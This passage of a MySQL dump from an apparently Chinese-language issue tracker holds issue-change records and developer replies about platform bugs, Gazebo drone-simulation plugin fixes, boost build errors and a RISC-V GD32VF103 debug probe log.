25,'attr','status_id','1','3'),(253,225,'attr','done_ratio','0','100'),(254,226,'attachment','1','','竞赛--后台无法修改标题.PNG'),(255,226,'attr','description','竞赛--管理员在后台无法修改竞赛标题','竞赛--管理员在后台无法修改竞赛标题。修改前后没有区别!'),(256,227,'attachment','1','','管理--开源项目列表.PNG'),(257,227,'attr','description',NULL,'管理员身份在后台管理页面点击开源项目,出现500'),(258,228,'attachment','1','','360浏览器点击评论.PNG'),(259,229,'attr','description','在开源项目中,用户点击“新建任务”,成功创建后,返回页面应为最新页面,不要用户手工刷新。','在开源项目中,用户点击“新建任务”,成功创建后,返回页面应为最新页面,不要用户手工刷新。这也许是浏览器的问题,我这里要点击刷新。'),(260,230,'attr','description','在开源项目中,用户点击“新建任务”,成功创建后,返回页面应为最新页面,不要用户手工刷新。这也许是浏览器的问题,我这里要点击刷新。','在开源项目中,用户点击“新建任务”,成功创建后,返回页面应为最新页面,不要用户手工刷新。这也许是浏览器的问题,我这里要点击刷新。应该是打开的窗口太多吧。'),(261,230,'attr','status_id','1','3'),(262,230,'attr','done_ratio','0','100'),(263,231,'attr','tracker_id','4','1'),(264,235,'attr','status_id','1','3'),(265,235,'attr','done_ratio','0','100'),(266,237,'attr','status_id','1','3'),(267,237,'attr','done_ratio','0','100'),(268,241,'attr','status_id','1','3'),(269,241,'attr','done_ratio','0','100'),(270,243,'attr','description','点击后台管理--主体信息列表,出现白屏。','点击后台管理--主体信息列表,出现白屏。\n'),(271,246,'attr','description','论坛版块点赞自己的帖子出现跳转不正确\n\n\n\n','论坛版块点赞自己的帖子出现跳转不正确,跳转到个人中心了。是否可以屏蔽掉对自己帖子的点赞。\n\n\n\n'),(272,247,'attr','description','有的浏览器打开项目部分功能不行,比如使用Edge','有的浏览器打开项目部分功能不行,比如使用Edge、360安全浏览器。'),(273,248,'attr','description','有的浏览器打开项目部分功能不行,比如使用Edge、360安全浏览器。','有的浏览器打开项目部分功能不行,比如使用360安全浏览器无法打开开源项目。'),(274,249,'attr','status_id','1','3'),(275,249,'attr','done_ratio','0','100'),(276,251,'attr','status_id','1','3'),(277,251,'attr','done_ratio','0','100'),(278,253,'attr','tracker_id','4','2'),(279,254,'attr','status_id','1','3'),(280,254,'attr','done_ratio','0','100'),(281,255,'attr','status_id','1','3'),(282,255,'attr','done_ratio','0','100'),(283,257,'attr','status_id','1','3'),(284,257,'attr','done_ratio','0','100'),(285,258,'attr','merge','','该合并请求已被合并'),(290,263,'attr','merge','','该合并请求已被合并'),(291,264,'attr','priority_id','2','4'),(292,265,'attr','fixed_version_id',NULL,'26'),(293,267,'attr','merge','','该合并请求已被合并'),(294,270,'attr','merge','','该合并请求已被合并'),(295,271,'attr','description',NULL,''),(296,272,'attr','subject','管理员账户无法登录开源项目后台进行管理','管理员账户无法登录开源项目后台进行管理且报404错误后'),(297,275,'attr','status_id','1','3'),(298,275,'attr','done_ratio','0','100'),(299,277,'attr','status_id','1','3'),(300,277,'attr','done_ratio','0','100'),(301,280,'attr','status_id','1','3'),(302,280,'attr','done_ratio','0','100'),(303,281,'attr','description','','\n\n点击开源项目,目前依然跳转到个人中心'),(304,282,'attr','status_id','1','3'),(305,282,'attr','done_ratio','0','100'),(306,283,'attr','subject','项目搜索报错','开源项目--项目搜索报错'),(307,284,'attr','subject','3. 合并出错','开源项目--合并出错'),(308,285,'attr','subject','1. 账号银行卡个人中心修改后未提示是否修改成功,且与管理界面不一致','账号管理--账号银行卡个人中心修改后未提示是否修改成功,且与管理界面不一致'),(309,286,'attr','subject','2. 管理员无法查看排行榜','竞赛活动--管理员无法查看排行榜'),(310,287,'attr','subject','1. 战队成员出错','竞赛活动--战队成员出错'),(311,288,'attr','subject','2. 延期时间设计出错,数值变成负数 ','创客空间--延期时间设计出错,数值变成负数 '),(312,289,'attr','subject','1. 任务发布时间出错','创客空间--任务发布时间出错'),(313,290,'attr','subject','5. 从首页进入开源项目,进入个人中心且弹出错误提示语','从首页进入开源项目,进入个人中心且弹出错误提示语'),(314,291,'attr','subject',' 修改仓库信息出错','开源项目--修改仓库信息出错'),(315,292,'attr','subject','4. 进入项目详情页出现提示语有问题','开源项目--进入项目详情页出现提示语有问题'),(316,293,'attr','subject','按照分类报错','开源项目--按照分类报错'),(317,294,'attr','subject','新账号,使用邮箱无法克隆,使用用户名可以克隆','开源项目--新账号,使用邮箱无法克隆,使用用户名可以克隆'),(318,295,'attr','subject','项目类别数量报错','开源项目--项目类别数量报错'),(319,296,'attr','status_id','1','3'),(320,296,'attr','done_ratio','0','100'),(321,297,'attr','subject','文件下载,404错误','开源项目--文件下载,404错误'),(322,298,'attr','subject','风雷项目上传大文件失败','开源项目--风雷项目上传大文件失败'),(323,299,'attr','subject','开源项目跟其他板块导航栏不一样','开源项目--开源项目跟其他板块导航栏不一样'),(324,300,'attr','assigned_to_id',NULL,'49'),(325,301,'attr','status_id','1','3'),(326,301,'attr','done_ratio','0','100'),(327,302,'attr','subject','开源项目--无法主动加入其他人项目。但是项目的创建者却可以拉别人进入,且不需要别人同意','开源项目--无法主动加入其他人项目。但是项目的创建者却可以添加其他成员,且不需要别人同意'),(328,303,'attr','merge','','该合并请求已被合并'),(329,304,'attr','status_id','1','3'),(330,304,'attr','done_ratio','0','100');
|
||
/*!40000 ALTER TABLE `journal_details` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `journal_replies`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `journal_replies`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `journal_replies` (
|
||
`journal_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`reply_id` int(11) DEFAULT NULL,
|
||
KEY `index_journal_replies_on_user_id` (`user_id`),
|
||
KEY `index_journal_replies_on_journal_id` (`journal_id`),
|
||
KEY `index_journal_replies_on_reply_id` (`reply_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `journal_replies`
|
||
--
|
||
|
||
LOCK TABLES `journal_replies` WRITE;
|
||
/*!40000 ALTER TABLE `journal_replies` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `journal_replies` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `journals`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `journals`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `journals` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`journalized_id` int(11) NOT NULL DEFAULT '0',
|
||
`journalized_type` varchar(30) NOT NULL DEFAULT '',
|
||
`user_id` int(11) NOT NULL DEFAULT '0',
|
||
`notes` text,
|
||
`created_on` datetime NOT NULL,
|
||
`private_notes` tinyint(1) NOT NULL DEFAULT '0',
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`comments_count` int(11) DEFAULT '0',
|
||
`reply_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `journals_journalized_id` (`journalized_id`,`journalized_type`),
|
||
KEY `index_journals_on_user_id` (`user_id`),
|
||
KEY `index_journals_on_journalized_id` (`journalized_id`),
|
||
KEY `index_journals_on_created_on` (`created_on`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=305 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `journals`
|
||
--
|
||
|
||
LOCK TABLES `journals` WRITE;
|
||
/*!40000 ALTER TABLE `journals` DISABLE KEYS */;
|
||
INSERT INTO `journals` VALUES (2,4,'Issue',1,'','2018-07-20 10:02:24',0,NULL,0,NULL),(3,15,'Issue',5,'','2018-07-23 14:25:07',0,NULL,0,NULL),(4,15,'Issue',5,'','2018-07-23 14:28:10',0,NULL,0,NULL),(5,15,'Issue',5,'','2018-07-23 14:31:34',0,NULL,0,NULL),(6,14,'Issue',5,'','2018-07-23 14:31:49',0,NULL,0,NULL),(7,13,'Issue',5,'','2018-07-23 14:32:16',0,NULL,1,NULL),(8,14,'Issue',5,'','2018-07-23 14:33:03',0,NULL,0,NULL),(9,14,'Issue',5,'','2018-07-23 14:33:25',0,NULL,0,NULL),(10,14,'Issue',5,'66666','2018-07-23 14:34:19',0,NULL,0,NULL),(11,14,'Issue',5,'','2018-07-23 14:37:35',0,NULL,0,NULL),(12,6,'Issue',5,'','2018-08-02 22:55:02',0,NULL,0,NULL),(13,17,'Issue',1,'ok,先完成issue模块,再完成新建和配置模块','2018-08-03 16:48:17',0,NULL,1,NULL),(15,5,'Issue',1,'???','2018-08-03 17:07:26',0,NULL,0,NULL),(18,17,'Issue',1,'新建和配置现在还没对应','2018-08-03 17:11:00',0,13,0,13),(21,21,'Issue',1,'','2018-08-03 17:50:55',0,NULL,0,NULL),(22,21,'Issue',1,'','2018-08-03 18:08:30',0,NULL,0,NULL),(23,21,'Issue',1,'','2018-08-03 18:10:26',0,NULL,0,NULL),(24,21,'Issue',1,'','2018-08-03 18:11:18',0,NULL,0,NULL),(26,15,'Issue',5,'问题已解决','2018-08-08 09:21:34',0,NULL,0,NULL),(27,14,'Issue',5,'已查看附件','2018-08-08 09:22:07',0,NULL,0,NULL),(28,13,'Issue',5,'附件图太小','2018-08-08 09:22:35',0,7,0,7),(30,25,'Issue',1,'恩','2018-08-10 09:18:52',0,NULL,2,NULL),(31,31,'Issue',19,'','2019-01-21 10:18:56',0,NULL,0,NULL),(32,32,'Issue',1,'','2019-01-21 15:40:10',0,NULL,0,NULL),(33,32,'Issue',1,'','2019-01-21 15:40:30',0,NULL,0,NULL),(34,35,'Issue',1,'','2019-01-22 00:37:36',0,NULL,0,NULL),(35,38,'Issue',1,'','2019-01-22 00:40:41',0,NULL,0,NULL),(36,38,'Issue',1,'','2019-01-22 00:40:54',0,NULL,0,NULL),(37,38,'Issue',6,'','2019-01-22 00:45:20',0,NULL,0,NULL),(38,38,'Issue',6,'','2019-01-22 00:46:41',0,NULL,0,NULL),(39,38,'Issue',1,'','2019-01-22 00:57:05',0,NULL,0,NULL),(40,41,'Issue',1,'','2019-01-22 09:14:24',0,NULL,0,NULL),(41,41,'Issue',6,'','2019-01-22 09:20:38',0,NULL,0,NULL),(46,44,'Issue',26,'<p style=\"font-size:13px;font-family:"\">\n 麻烦提供以下更详细的信息以便更快定位问题:\n</p>\n<p style=\"font-size:13px;font-family:"\">\n 1. 你电脑上现有gzserver的执行路径和依赖库信息(ldd命令可获取);\n</p>\n<p style=\"font-size:13px;font-family:"\">\n 2. 出现错误时的log文件。\n</p>','2019-04-17 14:02:47',0,NULL,0,NULL),(47,46,'Issue',26,'','2019-04-17 14:23:57',0,NULL,0,NULL),(48,46,'Issue',26,'','2019-04-17 14:24:44',0,NULL,0,NULL),(49,46,'Issue',26,'','2019-04-17 14:25:35',0,NULL,0,NULL),(50,44,'Issue',43,'在附件上<br />','2019-04-17 16:21:17',0,NULL,0,NULL),(51,44,'Issue',43,'测试(4-17).txt','2019-04-17 17:36:14',0,NULL,0,NULL),(53,45,'Issue',26,'<p style=\"padding:0px;color:#484848;background-color:#FFFFFF;\">\n <span>经排查定位发现是由于rosflight包中<span style=\"color:#484848;background-color:#FFFFFF;\">气动</span><span style=\"color:#484848;background-color:#FFFFFF;\">力和力矩</span>插件aircraft_forces_and_moments_plugin(由rosplane_sim包下aircraft_forces_and_moments.cpp文件实现)<span style=\"color:#484848;background-color:#FFFFFF;\">气动</span><span style=\"color:#484848;background-color:#FFFFFF;\">力和力矩</span>更新逻辑问题导致。</span>\n</p>\n<p style=\"padding:0px;color:#484848;background-color:#FFFFFF;\">\n <span><br />\n</span>\n</p>\n<p style=\"padding:0px;color:#484848;background-color:#FFFFFF;\">\n <span>正常情况下,无人机没有收到飞控指令时,应保持原地不动,仅受重力和地面对其向上的支撑力,没有产生正常飞行时受到的气动力和力矩。但是该插件原逻辑为仿真开始后,无论是否收到飞控指令,均对仿真模型进行气动力和力矩更新。<span>气动</span><span>力和力矩</span><span>更新计算依赖</span>飞控指令参数,当未受到飞控指令时,<span>飞控</span><span>指令</span>参数初始为随机值,会出现仿真过程中气动力和力矩计算发散现象,导致出现inf无限大的不正常数据状态。</span>\n</p>\n<p style=\"padding:0px;color:#484848;background-color:#FFFFFF;\">\n <span><br />\n</span>\n</p>\n<p style=\"padding:0px;color:#484848;background-color:#FFFFFF;\">\n <span>改变<span>气动力</span><span>和</span><span>力矩</span>更新逻辑:当接收到飞控指令后再对仿真模进行<span>气动力</span><span>和</span><span>力矩</span><span></span><span>更新</span>。修改后的插件文件如附件所示。</span>\n</p>','2019-04-17 22:29:56',0,NULL,0,NULL),(54,45,'Issue',26,'<img title=\"image\" alt=\"image\" src=\"/files/uploads/image/201904/4972d91fb6f5.png\" />','2019-04-18 17:09:18',0,NULL,0,NULL),(56,45,'Issue',26,'aircraft_forces_and_moments.h与aircraft_forces_and_moments.cpp修改逻辑后aircraft_forces_and_moments_plugin插件实现文件','2019-04-18 17:13:41',0,NULL,0,NULL),(57,47,'Issue',26,'<p>\n 修改/usr/include/boost/type_traits/detail/has_binary_operator.hpp文件\n</p>\n<p>\n <br />\n将namespace BOOST_JOIN(BOOST_TT_TRAIT_NAME,_impl) {\n</p>\n<p>\n ..\n</p>\n<p>\n }\n</p>\n<p>\n 改为\n</p>\n<p>\n #ifndef Q_MOC_RUN<br />\nnamespace BOOST_JOIN(BOOST_TT_TRAIT_NAME,_impl) {<br />\n#endif\n</p>\n<p>\n ...\n</p>\n<p>\n #ifndef Q_MOC_RUN<br />\n}<br />\n#endif\n</p>','2019-04-18 17:53:15',0,NULL,0,NULL),(58,47,'Issue',26,'安装完后,需设置环境变量LD_LIBRARY_PATH,将/usr/local/lib添加到该变量中,命令如下:<br />\necho \"export LD_LIBRARY_PATH=/usr/local/lib:$LD_LIBRARY_PATH\" >> ~/.bashrc<br />\nsource ~/.bashrc','2019-04-18 17:57:30',0,NULL,0,NULL),(59,48,'Issue',26,'<p>\n 出现该错误原因是ignition包的Include目录未设置导致,可通过以下命令解决:\n</p>\n<p>\n 1、echo \"export CPLUS_INCLUDE_PATH=/usr/include/ignition/math2/:$CPLUS_INCLUDE_PATH\" >> ~/.bashrc\n</p>\n<p>\n 2、source ~/.bashrc\n</p>','2019-04-29 11:25:08',0,NULL,0,NULL),(60,49,'Issue',26,'该编译错误是由于所用boost版本不同导致,可将附件中文件解压后拷贝至/usr/include/boost解决','2019-04-29 11:33:05',0,NULL,0,NULL),(61,50,'Issue',26,'造成该现象的原因是由于Gazebo仿真运行时,使用OpenGL利用显卡硬件加速失败导致。OpenGL利用显卡硬件加速时,需要硬件厂商提供的ICD驱动。对带有英伟达独立显卡的计算机,应安装英伟达独显驱动,安装教程如附件所示。','2019-04-29 13:22:20',0,NULL,0,NULL),(62,50,'Issue',51,'<p>\n 我也遇到这个问题了\n</p>','2019-08-07 15:03:10',0,NULL,0,NULL),(63,50,'Issue',46,'可能是运行程序的权限不够,用管理员身份运行试一试。','2019-08-14 14:35:38',0,NULL,0,NULL),(64,55,'Issue',50,'顶下','2019-08-16 09:24:46',0,NULL,0,NULL),(65,55,'Issue',50,'挺好的','2019-08-24 14:51:21',0,NULL,0,NULL),(68,62,'Issue',46,'我已经修复该bug','2019-10-23 16:15:25',0,NULL,0,NULL),(69,63,'Issue',49,'','2019-10-23 16:46:50',0,NULL,0,NULL),(70,62,'Issue',49,'我参考了该问题','2019-10-23 16:54:36',0,NULL,0,NULL),(71,62,'Issue',49,'','2019-10-23 16:54:49',0,NULL,0,NULL),(72,64,'Issue',46,'第一个问题我也遇到过','2019-10-31 17:00:14',0,NULL,0,NULL),(73,65,'Issue',61,'问题已解决,是 rvl_target_write_memory 出了问题,rvl_target_write_memory 的问题是引用了错误的 pt <br />','2019-10-31 17:00:59',0,NULL,0,NULL),(74,67,'Issue',2,'<p style=\"margin-left:0.64cm;\">\n <span><span>造成该现象的原因是由于系统编译运行,使用</span></span><span><span><span><span>OpenGL</span></span></span></span><span><span>利用显卡硬件加速失败导致。</span></span><span><span><span><span>OpenGL</span></span></span></span><span><span>利用显卡硬件加速时,需要硬件厂商提供的</span></span><span><span><span><span>ICD</span></span></span></span><span><span>驱动。对带有英伟达独立显卡的计算机,应安装英伟达独显驱动</span></span>\n</p>','2019-10-31 17:04:31',0,NULL,0,NULL),(75,68,'Issue',46,'<div class=\"text note-content markdown-body\">\n <p>\n GD32VF103 的 prober 输出:\n </p>\n<pre>finding TAPs..................................................\nfound <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span> TAP(s)\n TAP0 ir <span class=\"hljs-string\"><span class=\"hljs-string\">len:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">5</span></span> TAP1 ir <span class=\"hljs-string\"><span class=\"hljs-string\">len:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">5</span></span> TAP0 config ==================================================\n ir <span class=\"hljs-string\"><span class=\"hljs-string\">pre:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">ir_post:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">5</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> dr_pre:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">dr_post:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> idcode:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x1000563d</span></span> idcode.<span class=\"hljs-string\"><span class=\"hljs-string\">version:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> idcode.<span class=\"hljs-string\"><span class=\"hljs-string\">part_number:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x5</span></span> idcode.<span class=\"hljs-string\"><span class=\"hljs-string\">manuf_id:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x31e</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> dtmcs:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00007071</span></span> dtmcs.<span class=\"hljs-string\"><span class=\"hljs-string\">version:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> dtmcs.<span class=\"hljs-string\"><span class=\"hljs-string\">abits:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">7</span></span> dtmcs.<span class=\"hljs-string\"><span class=\"hljs-string\">idle:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">6</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> dmstatus:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00430ca2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">version:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">confstrptrvalid:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">hasresethaltreq:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">authenticated:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">impebreak:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> dmcontrol:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00000001</span></span> dmcontrol.<span class=\"hljs-string\"><span class=\"hljs-string\">dmactive:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> halt hart... <span class=\"hljs-string\"><span class=\"hljs-string\">dmstatus:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x004303a2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">anyhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">allhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> hartinfo:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x002140c0</span></span> hartinfo.<span class=\"hljs-string\"><span class=\"hljs-string\">dataaddr:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">192</span></span> hartinfo.<span class=\"hljs-string\"><span class=\"hljs-string\">datasize:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">4</span></span> hartinfo.<span class=\"hljs-string\"><span class=\"hljs-string\">dataaccess:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span>, memory map\nhartinfo.<span class=\"hljs-string\"><span class=\"hljs-string\">nscratch:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> abstractcs:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x02000004</span></span> abstractcs.<span class=\"hljs-string\"><span class=\"hljs-string\">datacount :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">4</span></span> abstractcs.<span class=\"hljs-string\"><span class=\"hljs-string\">progbufsize :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> abstractauto:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0003000f</span></span> abstractauto.<span class=\"hljs-string\"><span class=\"hljs-string\">autoexecdata :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00f</span></span> abstractauto.<span class=\"hljs-string\"><span class=\"hljs-string\">autoexecprogbuf :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0003</span></span> <span class=\"hljs-label\"><span class=\"hljs-label\"> sbcs:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00000000</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbaccess8 :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbaccess16 :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbaccess32 :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbaccess64 :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbaccess128 :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> sbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbasize :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> bits\nsbcs.<span class=\"hljs-string\"><span class=\"hljs-string\">sbversion :</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> read x1 <span class=\"hljs-string\"><span class=\"hljs-string\">x1:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0800155c</span></span> read misa <span class=\"hljs-string\"><span class=\"hljs-string\">misa:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x40901105</span></span> read dpc <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x08002248</span></span> resume hart... <span class=\"hljs-string\"><span class=\"hljs-string\">dmstatus:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00430ca2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">anyhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">allhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> quick access\nquick access <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x08002998</span></span> quick access <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x08002a64</span></span> quick access <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x080022e4</span></span> quick access <span class=\"hljs-number\"><span class=\"hljs-number\">3</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x080029a4</span></span> quick access <span class=\"hljs-number\"><span class=\"hljs-number\">4</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x08001a2c</span></span> quick access <span class=\"hljs-number\"><span class=\"hljs-number\">5</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">dpc:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x080026b4</span></span> access memory\nhalt hart... <span class=\"hljs-string\"><span class=\"hljs-string\">dmstatus:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x004003a2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">anyhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">allhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span> access memory <span class=\"hljs-number\"><span class=\"hljs-number\">0x08000000</span></span>: <span class=\"hljs-number\"><span class=\"hljs-number\">0x15c0006f</span></span> probe triggers <span class=\"hljs-string\"><span class=\"hljs-string\">tselect_max:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">3</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">tselect:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">tinfo:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0000003c</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">tselect:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">1</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">tinfo:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0000003c</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">tselect:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">2</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">tinfo:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0000003c</span></span> <span class=\"hljs-string\"><span class=\"hljs-string\">tselect:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">3</span></span>, <span class=\"hljs-string\"><span class=\"hljs-string\">tinfo:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x0000003c</span></span> resume hart... <span class=\"hljs-string\"><span class=\"hljs-string\">dmstatus:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0x00430ca2</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">anyhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> dmstatus.<span class=\"hljs-string\"><span class=\"hljs-string\">allhalted:</span></span> <span class=\"hljs-number\"><span class=\"hljs-number\">0</span></span> </pre>\n</div>','2019-10-31 17:04:53',0,NULL,0,NULL),(76,68,'Issue',46,'GD32VF103 已经支持 abstractauto','2019-10-31 17:05:24',0,NULL,0,NULL),(77,67,'Issue',49,'','2019-10-31 17:05:53',0,NULL,0,NULL),(78,69,'Issue',49,'<p class=\"MsoListParagraph\" style=\"margin-left:21.0pt;text-indent:0cm;\">\n 问题<span>1</span>: 在运行<span>demo</span>的时候,有时候成功有时候会断,出现图中错误,是不是跟上次安装<span>boost</span>有关;问题<span>2</span>:按照源码重新安装后,在运行成功我们这边的<span>demo</span>的时候在界面上有卡顿现象,原版的时候没有出现卡顿;问题<span>3</span>:见问题汇总附件。<span></span>\n</p>\n<p class=\"MsoListParagraph\" style=\"margin-left:21.0pt;text-indent:0cm;\">\n 并上传附件图片和文件信息供查看<span></span>\n</p>','2019-11-06 16:39:06',0,NULL,0,NULL),(79,69,'Issue',49,'','2019-11-06 16:53:12',0,NULL,0,NULL),(80,73,'Issue',46,'<p>\n GD32VF103 已经支持<span> abstractauto</span>\n</p>\n<p>\n <br />\n</p>','2019-11-07 16:06:58',0,NULL,0,NULL),(81,73,'Issue',46,'<p style=\"margin-left:21.0pt;text-indent:-21.0pt;\">\n 1) GD32VF103 的<span> prober </span>输出: <span></span>\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n finding\nTAPs..................................................\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n found 2 TAP(s)\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n TAP0 ir len: 5\nTAP1 ir len: 5 TAP0 config ==================================================\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n ir pre: 0,\nir_post: 5 dr_pre: 0, dr_post: 1 idcode: 0x1000563d idcode.version: 1\nidcode.part_number: 0x5 idcode.manuf_id: 0x31e \ndtmcs: 0x00007071 dtmcs.version: 1 dtmcs.abits: 7 